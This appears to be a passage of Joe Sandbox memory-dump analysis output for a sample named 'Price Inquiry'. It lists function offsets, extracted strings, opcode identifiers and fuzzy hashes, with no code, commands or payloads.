Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a828fb7722f08146a7e70f92f0b6a5cb86e5602acb193ea3981e80f3ba57639e
Instruction ID: 63ddbf931e8db699d153561c2d6f02b1b0750c6476faa9ba0d2bf964e08b7504
Opcode Fuzzy Hash: a828fb7722f08146a7e70f92f0b6a5cb86e5602acb193ea3981e80f3ba57639e
Instruction Fuzzy Hash: 4A918472940219AFEB21DF95CC85FAEBBB9EF14B50F500159FB01AB291D774AD00CBA4

Function 0177E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0177E1FA

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 36dff029aaf45088956290c30be79e9863583c7b64480dee3b0222719d093717
Instruction ID: 8559970fb5dbbaff27a2418feb80c947a2b29e92e1418b2c9fe713c51ea015b2
Opcode Fuzzy Hash: 36dff029aaf45088956290c30be79e9863583c7b64480dee3b0222719d093717
Instruction Fuzzy Hash: 04919E71901609BEDF22ABA5DC48FAFFBBAEF45740F1000A9F605A7250EB749941CB90

Function 0170A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 017467C9

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 3ebd056e0cc72309e4f9223f615119b8ec8b6bf13f94c91475ce2db26d2434ae
Instruction ID: 5494f6d697837db2df76bae5f1be78d20642cda85b70eb1ab5b357d299d153bf
Opcode Fuzzy Hash: 3ebd056e0cc72309e4f9223f615119b8ec8b6bf13f94c91475ce2db26d2434ae
Instruction Fuzzy Hash: 10716BB5E0020A9FEF29CF98C990AADFBB6BF49710F14816EE506A7241E7319941CB54

Function 01774978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01774A7F

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 71582f2a0e8dd985b24f788587e35894c79cecc6d370fb56be966b6bbff94b91
Instruction ID: 0ea35c339b74a451a8a87698cc19497f20ec3a585d58588f76f74a728f3a063d
Opcode Fuzzy Hash: 71582f2a0e8dd985b24f788587e35894c79cecc6d370fb56be966b6bbff94b91
Instruction Fuzzy Hash: 16518272D0022A9BDF11EF99D844ABEFBB5AF18A50F054169EA12BB250D7349D01CFE4

Function 016EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 016EE6A4

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 65376cf2fe79c66b01b1e76cf84e24fa5eb4aae60e85ea30d0b94f26d430b2c9
Instruction ID: d826a36fa8f8d879258f31fd34009534cac1a3cd4f4f7b379bdd60ace2c22b16
Opcode Fuzzy Hash: 65376cf2fe79c66b01b1e76cf84e24fa5eb4aae60e85ea30d0b94f26d430b2c9
Instruction Fuzzy Hash: D541D07254A3129BDB10DA79DC48B6BBBE9EF88704F040B2DF684D7280E775D904C796

Function 0174C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0174C77F

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 8b9a95ac53050486363f0536001880b4ea0a33aada9ae20360eb67b639f7ca2f
Instruction ID: 56c7fa957c0e16997e0b3f3b4d8fdb734c5255c8d41aca19dfe6d76fcd3528a4
Opcode Fuzzy Hash: 8b9a95ac53050486363f0536001880b4ea0a33aada9ae20360eb67b639f7ca2f
Instruction Fuzzy Hash: B04163B1D0122DABEB21DA54CC84FDEF77CAB44714F0045A5EB08AB144DB709E89CFA4

Function 017507C3 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

?F.C, xrefs: 017507EE

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: ?F.C
API String ID: 0-432660383
Opcode ID: 008495c0f3bc8ad28419cf91da9aada8c1d92af12d6b2578cbfb79e51f6a6ae1
Instruction ID: 0df34967683d6b8c581f9c95542dd53590500d8daa23e1c22e63105fbc664069
Opcode Fuzzy Hash: 008495c0f3bc8ad28419cf91da9aada8c1d92af12d6b2578cbfb79e51f6a6ae1
Instruction Fuzzy Hash: F5418B71504301AFD360DF29C845B9BFBE8FF88764F108A2EF99897254D770A844CB92

Function 01766B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01766B91

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: b81a88af46b87f27552a8ebeacff57f1a26a33002fc7ec387f50ccc3f2826cf6
Instruction ID: cc6dac9442e2200ae6cbb6c526d451d9f14a799c3aa929c88a057d53bceaaf86
Opcode Fuzzy Hash: b81a88af46b87f27552a8ebeacff57f1a26a33002fc7ec387f50ccc3f2826cf6
Instruction Fuzzy Hash: A3312831A00B099BEB22DF69C854BAEFBADDF44704F94406CFD41AB286C775E805CB90

Function 0174CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0174CAA2

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 63c4f9f89b1a6bdf92a491415f175a683cb6c6af76463f067694affaa38a3cd4
Instruction ID: e9f44d80c544b6e7a2626a6774c3e1e4f3eb9f48a47e3372de3fe42cb9b12451
Opcode Fuzzy Hash: 63c4f9f89b1a6bdf92a491415f175a683cb6c6af76463f067694affaa38a3cd4
Instruction Fuzzy Hash: CD313336902515AFEB16CB48C844E7FFBB4EB80720F014169AA01A7251D7309E00EBE0

Function 0041ECED Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

\, xrefs: 0041ED3F

Memory Dump Source

Source File: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Price Inquiry.jbxd

Yara matches

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: cd92b2580c5dd2da17ceee1cde43f62f07d72c1235aab083e5c8981dcaf33c9d
Instruction ID: eeee24e5538f2f4e25c56492c70c2e508a79448b9a66f6f93e370c09374a36e2
Opcode Fuzzy Hash: cd92b2580c5dd2da17ceee1cde43f62f07d72c1235aab083e5c8981dcaf33c9d
Instruction Fuzzy Hash: 0B01BE7194032D7AEB20D7D6DC85FDF777C9B04748F40415EF60CA6181EBB4A6448B65

Function 0175892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0175895E

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: fc14847b5fa4e520a84b95227d8a19f1ca46bac6cfbe66fc0be99d0502fd16af
Instruction ID: 2a90cf528319cfe09a098ff2fb084e8f96100f4860fa28f7bdd5e1e864d82ce7
Opcode Fuzzy Hash: fc14847b5fa4e520a84b95227d8a19f1ca46bac6cfbe66fc0be99d0502fd16af
Instruction Fuzzy Hash: C101F7713042119FE7606A5B8C84A66FBB6EFC5764B04002CFA821A151CFB16841C797

Function 01772000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b6668fefa66180cb8a58c6453fcfb1653bc12dc9848a234c4f7901080be2ed
Instruction ID: c54a003932f029cbbbd830e9e66c4e34b1c10a715a78ea58aaf901a7d1a7a56a
Opcode Fuzzy Hash: c5b6668fefa66180cb8a58c6453fcfb1653bc12dc9848a234c4f7901080be2ed
Instruction Fuzzy Hash: 8742D2326083419FDF25CF68C890A6BFBE5BF88700F18492DFAA297252D771D945CB52

Function 01768158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a47695c0f110520fad0185ba2794be87b00bb88d5ad22ef57ebe672a5936f9
Instruction ID: c35e06190c2bb237f889cce40170819e7cd69a0ea542eb196e0ebca34ae9074a
Opcode Fuzzy Hash: 44a47695c0f110520fad0185ba2794be87b00bb88d5ad22ef57ebe672a5936f9
Instruction Fuzzy Hash: CA424D75A103198FEB24CF69C881BADFBFABF48310F148199E949AB242D7349D85CF51

Function 016E2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a54250a3afe2daa31db32e3cbd469c4006a6294cdec11c06e1c4456ad4fbe56
Instruction ID: 94e0027735a65dde9650968c1485bcf29c35a511f3ff0250a00ff71b437d310a
Opcode Fuzzy Hash: 9a54250a3afe2daa31db32e3cbd469c4006a6294cdec11c06e1c4456ad4fbe56
Instruction Fuzzy Hash: 3132EFB0A00755AFDB25CF69C8587BEFBF2BF84300F24411DE5869B286D735AA42CB50

Function 0177A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c8c63aff1fe737b9c1dbe30568fedafd7a6916295d7bb81f0dbca5b0ee3861
Instruction ID: 5761f1530bb052fc7c0567eb27566fea15f40d38f6cf3957073e82134d601964
Opcode Fuzzy Hash: 42c8c63aff1fe737b9c1dbe30568fedafd7a6916295d7bb81f0dbca5b0ee3861
Instruction Fuzzy Hash: 4E229B702046618BFF25CF2DC09477AFBF1AF45300F1C889AE9968B286E735E552DB61

Function 016D6A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33f498b5c290fc1e7f6a23a74d2b99d5639d2996cfef1532afa9e626ed2a36f
Instruction ID: 625c608f39b9a0a2fa64c1c8fe0f4dd577a74c77452603b466303d134a826a51
Opcode Fuzzy Hash: a33f498b5c290fc1e7f6a23a74d2b99d5639d2996cfef1532afa9e626ed2a36f
Instruction Fuzzy Hash: BD329D71A05205CFDB25CF68C880BAAFBF1FF88310F548569E956AB396D734E841CB91

Function 016F4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 53756ecfeaad5838c3be5b8e82ddd01aab7dbe5e6be09bc309f50b720ee81954
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 52F16F71E0021A9BDB15CFA9D990BAEFBF5AF48710F04816DEA05EB745EB34D842CB50

Function 0176892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e66f2b892a3d3d50b4ebd28198f298671b3440e0be4707d343c95027c75584a
Instruction ID: c28d6223cadb673b3b26cf9ff61031122b644d1480d3820631fbc1339f09d72f
Opcode Fuzzy Hash: 3e66f2b892a3d3d50b4ebd28198f298671b3440e0be4707d343c95027c75584a
Instruction Fuzzy Hash: 57D1E171A0070A8BDF15CF69C841ABEF7FAAF88304F1881AADD55A7241D735EA058B61

Function 016D65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8445ada955c3e2c5e56b6233b3f5ed0075a0542d8259a96b3128fd9877bc376c
Instruction ID: 85a18dd603db3c732e3f1f49a748b380d3be1c0c58a97190479693b7b4d0e339
Opcode Fuzzy Hash: 8445ada955c3e2c5e56b6233b3f5ed0075a0542d8259a96b3128fd9877bc376c
Instruction Fuzzy Hash: 2DE18F71909342CFC715CF28C990A6ABBE1FF89314F058A6DF9958B351DB31E905CB92

Function 016C8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f0c790f442dd401ef94e195c3566044e43cfba097d597b7853d1a382b8da24
Instruction ID: 45ad3d8332ce3a3996138c3363eca4d51143d32f7a96844d02d5035a19436090
Opcode Fuzzy Hash: 91f0c790f442dd401ef94e195c3566044e43cfba097d597b7853d1a382b8da24
Instruction Fuzzy Hash: 8FD1F771A002169BDB24DF69CC90ABEB7A9FF54B04F05862DE915DB280F734E952CB60

Function 01758243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: f1c85c8f3d0db5f1c7e1c7060fb112d5fff16b1dac4c2f537024897b232a165e
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 25B1C275A002059FDFA4DF9AC944BAFFBB9BF84344F10445DAE4297394DAB0E906CB11

Function 016E0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: b3528ffff569f77118f9d89be2e7892167f35e664adca73a93e5b2f6148c615c
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 2CB11531701646AFDB25DB68C958BBEFBF6AF84300F280299E55297386D770E941CB90

Function 016D83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88daa8326741ac4bf41d3c46b1114eb740fbe609f9fcf28570307633451b84c2
Instruction ID: e3d712fa6197c20ec6faaed66f2b47e5254d51a9ffe8abed195df2022a1e24f7
Opcode Fuzzy Hash: 88daa8326741ac4bf41d3c46b1114eb740fbe609f9fcf28570307633451b84c2
Instruction Fuzzy Hash: 40C157745083418FD764CF19C898BAAF7E9BF88304F84496DE98987391D774E909CF92

Function 016CC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 507f652d5c57b7781637d3abb8f7d55d5e972f6d7df7e07d6247d0af36be1a81
Instruction ID: 30c62b49eb549170458e9604770f73d33de3c40e7c94f935e3664972cb6e02af
Opcode Fuzzy Hash: 507f652d5c57b7781637d3abb8f7d55d5e972f6d7df7e07d6247d0af36be1a81
Instruction Fuzzy Hash: 8FB16070A002668BDB24DF68CD90BB9B3B6EF54700F4485EDD50EE7681EB349D86CB24

Function 016FE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f66df2d5e4086c2ef6588d80989e117eb16983218ecd6a4f46b55e0ebe9aa9
Instruction ID: c9443675faff57f5c89d3c7718dbc19b27db4ddddef427ccb095a6b56898145a
Opcode Fuzzy Hash: 29f66df2d5e4086c2ef6588d80989e117eb16983218ecd6a4f46b55e0ebe9aa9
Instruction Fuzzy Hash: 74A12731E006299FEB21DB6CCC48BADFFA5AB41754F050169EB00AB2A2D7759D41CB92

Function 01710185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f14661dd2904a02f11735c3fe30473e3403e9a01b79faae8c5dc1d30cd4c7b
Instruction ID: a9b2fb2284cf3e497fbe7b6653f99b16a730a153718b5e2200b11d4af77900d3
Opcode Fuzzy Hash: d9f14661dd2904a02f11735c3fe30473e3403e9a01b79faae8c5dc1d30cd4c7b
Instruction Fuzzy Hash: D9A1BE70B016169FDB25CF6DC990BAAF7B5FF58318F104029FA459728AEB34E851CB90

Function 017A4500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 207087b2f405c539b5dbe86f1871d1d77021f60d551806d1e79bcbee0ddb961f
Instruction ID: 1854e87486a62af9f561b93ba3dc25dc78fdd34afccfe1c584ffdb0d8bd144db
Opcode Fuzzy Hash: 207087b2f405c539b5dbe86f1871d1d77021f60d551806d1e79bcbee0ddb961f
Instruction Fuzzy Hash: FEA1CE72A05252DFC721DF18C980B2AFBE9FF88704F89462CF5869B651D3B5E900CB95

Function 017560E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11efda46bf8a39d978d2b962dc57a1bab0d7742c235ff5349a8f79f20c7866d
Instruction ID: 94642c3c8c7b4ff025731d6b0b7911c25b4a07152b4adb57d62e3b045d9fb12f
Opcode Fuzzy Hash: d11efda46bf8a39d978d2b962dc57a1bab0d7742c235ff5349a8f79f20c7866d
Instruction Fuzzy Hash: A191C271E04216AFDB51CF68D884BBEFBB5AF48710F544169FA10AB341D774E9009BA0

Function 016EE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7cca305c3eae7daddd882fb4139bc223259efdb0ee151b8acbf12b9d0dcbb3
Instruction ID: cc334186c90474a7dcd17f5b290004e7792a3d7fb12d2c069a10330fa1efa1a5
Opcode Fuzzy Hash: fd7cca305c3eae7daddd882fb4139bc223259efdb0ee151b8acbf12b9d0dcbb3
Instruction Fuzzy Hash: BE914631A02216CBEB24DB58CC88BBABBF2EF94714F05426DEA059B341F776D902C751

Function 01726ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 809d095e12f9027008d994d179285b8b5360bd2b271cf4f201bf1bad610f76c7
Instruction ID: 59a2d1a5a142610d9e6aa1f50c556c77c298408c9121a6a67e1a35065ea548f0
Opcode Fuzzy Hash: 809d095e12f9027008d994d179285b8b5360bd2b271cf4f201bf1bad610f76c7
Instruction Fuzzy Hash: BF8183B1E006299BDB24DF69C940ABEFBF9FB48700F14852EE845D7641E334E981CB94

Function 0179AB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: 196031c3dd7ad91d961e9e82184e19e0727d11c489113101c70de1ec4d66333c
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: D6819F71A0121A9FDF19CF98D880AAEFBF2FF84310F188569D9169B345DB34E945CB40

Function 0170E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4f5a3c4ef0864daabe6120eac5275aa896ae8d4be47c3bb03f63d86a0f9982
Instruction ID: 9318d6691b3809731e754e0361c0f3de1b873c35fdf4833598677865d6354f3a
Opcode Fuzzy Hash: 2a4f5a3c4ef0864daabe6120eac5275aa896ae8d4be47c3bb03f63d86a0f9982
Instruction Fuzzy Hash: 86812E71A04709EFDB26CFA9C880AEEFBF9FB48354F144829E555A7254DB30AC45CB60

Function 016EC640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3cc8872f29f580e0d5889b7a6bee77ca38fb7ae5859ba8700972a7d0f997529
Instruction ID: 30ccd750b8ae201f3ffc1997dc6840cef78ae4b89e25bda34f0e8e19400c7ea9
Opcode Fuzzy Hash: a3cc8872f29f580e0d5889b7a6bee77ca38fb7ae5859ba8700972a7d0f997529
Instruction Fuzzy Hash: 6871BCB59116659FCB268F58C8947FEBBF1FF88710F14821AE942AB351D3309841CBA0

Function 01768D6B Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a07923cac06171f32924f6fd4714bfcaf23d5fa0620d08345f5c938d7313bf6
Instruction ID: 7007e9e9517ea6d2736d74fd1c5c47168b397f02492b2d928f6cc41f96376445
Opcode Fuzzy Hash: 3a07923cac06171f32924f6fd4714bfcaf23d5fa0620d08345f5c938d7313bf6
Instruction Fuzzy Hash: E671C0749042669FCB15CF59C840AFAFBF9EF49304F0880A9ED94DB246E335EA45C7A1

Function 017847A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da5c83e78d7e19730f5a3d15a62bdfb6be327964d46fb51b642db90283294f3c
Instruction ID: f93cf1ca24c369f1e66b682b6b44f50704373998cc47b1e9670780635deb34f5
Opcode Fuzzy Hash: da5c83e78d7e19730f5a3d15a62bdfb6be327964d46fb51b642db90283294f3c
Instruction Fuzzy Hash: 75719F70940206EFDB20EF99D984A9AFBF8EF84710F11815EE601EB359D7B19A80CB55

Function 016E260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6db35acccda1aa8f681b0b7f959e0b4fc72ec67c0186a75ab803ad6491d90cf5
Instruction ID: 410d63ec8a7d0a9dcd12b80977b7d16ed24e88f6fc70797808ebfb89b082047c
Opcode Fuzzy Hash: 6db35acccda1aa8f681b0b7f959e0b4fc72ec67c0186a75ab803ad6491d90cf5
Instruction Fuzzy Hash: 0D71F0716052529FC711DF28C898B2AF7EAFF84310F0486ADE8998B352DB34D946CB91

Function 0175035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

